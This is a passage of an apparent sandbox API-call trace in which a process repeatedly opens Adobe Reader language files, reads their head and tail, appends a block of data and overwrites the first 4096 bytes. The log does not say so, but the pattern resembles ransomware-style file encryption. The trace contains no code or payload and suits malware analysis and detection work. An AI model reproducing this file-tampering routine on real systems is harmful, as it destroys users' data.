WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.335] ReleaseMutex (hMutex=0x168) returned 1 [0090.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_EC.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0090.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_EC.txt", cchWideChar=30, lpMultiByteStr=0x1f8fedc, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.es_EC.txt", lpUsedDefaultChar=0x0) returned 30 [0090.335] ReadFile (in: hFile=0x1f8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0090.385] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x5ec6 [0090.385] ReadFile (in: hFile=0x1f8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0090.451] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x5ec6 [0090.452] WriteFile (in: hFile=0x1f8, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0090.452] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0090.452] WriteFile (in: hFile=0x1f8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0090.452] CloseHandle (hObject=0x1f8) returned 1 [0090.452] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PE.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_pe.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0090.453] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0090.453] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x6ec8 [0090.453] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0090.453] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.453] ReleaseMutex (hMutex=0x168) returned 1 [0090.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_PE.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0090.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_PE.txt", cchWideChar=30, lpMultiByteStr=0x1f8fedc, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.es_PE.txt", lpUsedDefaultChar=0x0) returned 30 [0090.453] ReadFile (in: hFile=0x1f8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0090.515] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x5ec8 [0090.515] ReadFile (in: hFile=0x1f8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0090.573] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x5ec8 [0090.573] WriteFile (in: hFile=0x1f8, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0090.573] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0090.573] WriteFile (in: hFile=0x1f8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0090.574] CloseHandle (hObject=0x1f8) returned 1 [0090.574] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.et.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.et.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0090.574] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0090.574] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x6b5e [0090.574] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0090.575] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.575] ReleaseMutex (hMutex=0x168) returned 1 [0090.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.et.txt", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0090.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.et.txt", cchWideChar=27, lpMultiByteStr=0x1f8fedc, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.et.txt", lpUsedDefaultChar=0x0) returned 27 [0090.575] ReadFile (in: hFile=0x1f8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0090.576] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x5b5e [0090.576] ReadFile (in: hFile=0x1f8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0090.677] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x5b5e [0090.677] WriteFile (in: hFile=0x1f8, lpBuffer=0x2867ab8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867ab8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0090.678] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0090.678] WriteFile (in: hFile=0x1f8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0090.678] CloseHandle (hObject=0x1f8) returned 1 [0090.704] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.he.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.he.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0090.704] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0090.705] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x67c2 [0090.705] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0090.705] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.705] ReleaseMutex (hMutex=0x168) returned 1 [0090.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.he.txt", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0090.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.he.txt", cchWideChar=27, lpMultiByteStr=0x1f8fedc, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.he.txt", lpUsedDefaultChar=0x0) returned 27 [0090.705] ReadFile (in: hFile=0x1f8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0090.860] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x57c2 [0090.860] ReadFile (in: hFile=0x1f8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.258] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x57c2 [0092.258] WriteFile (in: hFile=0x1f8, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0092.259] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0092.260] WriteFile (in: hFile=0x1f8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0092.260] CloseHandle (hObject=0x1f8) returned 1 [0092.346] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it_IT.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.it_it.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0092.347] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0092.347] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x6e88 [0092.347] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0092.347] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.348] ReleaseMutex (hMutex=0x168) returned 1 [0092.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.it_IT.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0092.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.it_IT.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.it_IT.txt", lpUsedDefaultChar=0x0) returned 30 [0092.348] ReadFile (in: hFile=0x1f8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.349] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x5e88 [0092.350] ReadFile (in: hFile=0x1f8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.350] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x5e88 [0092.351] WriteFile (in: hFile=0x1f8, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0092.352] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0092.352] WriteFile (in: hFile=0x1f8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0092.352] CloseHandle (hObject=0x1f8) returned 1 [0092.352] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lt_LT.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.lt_lt.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0092.353] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0092.353] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x6bea [0092.353] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0092.353] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.353] ReleaseMutex (hMutex=0x168) returned 1 [0092.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.lt_LT.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0092.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.lt_LT.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.lt_LT.txt", lpUsedDefaultChar=0x0) returned 30 [0092.353] ReadFile (in: hFile=0x1f8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.364] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x5bea [0092.364] ReadFile (in: hFile=0x1f8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.417] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x5bea [0092.417] WriteFile (in: hFile=0x1f8, lpBuffer=0x288ce18*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ce18*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0092.418] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0092.418] WriteFile (in: hFile=0x1f8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0092.418] CloseHandle (hObject=0x1f8) returned 1 [0092.419] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_NL.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl_nl.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0092.425] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0092.425] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x6dc6 [0092.425] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0092.425] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.426] ReleaseMutex (hMutex=0x168) returned 1 [0092.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.nl_NL.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0092.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.nl_NL.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.nl_NL.txt", lpUsedDefaultChar=0x0) returned 30 [0092.426] ReadFile (in: hFile=0x1f8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.435] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x5dc6 [0092.435] ReadFile (in: hFile=0x1f8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.445] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x5dc6 [0092.445] WriteFile (in: hFile=0x1f8, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0092.446] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0092.446] WriteFile (in: hFile=0x1f8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0092.446] CloseHandle (hObject=0x1f8) returned 1 [0092.446] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ro.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ro.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0092.447] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0092.447] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x6ba2 [0092.447] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0092.447] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.447] ReleaseMutex (hMutex=0x168) returned 1 [0092.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ro.txt", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0092.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ro.txt", cchWideChar=27, lpMultiByteStr=0x1f8fd5c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.ro.txt", lpUsedDefaultChar=0x0) returned 27 [0092.448] ReadFile (in: hFile=0x1f8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.456] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x5ba2 [0092.456] ReadFile (in: hFile=0x1f8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.458] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x5ba2 [0092.459] WriteFile (in: hFile=0x1f8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, 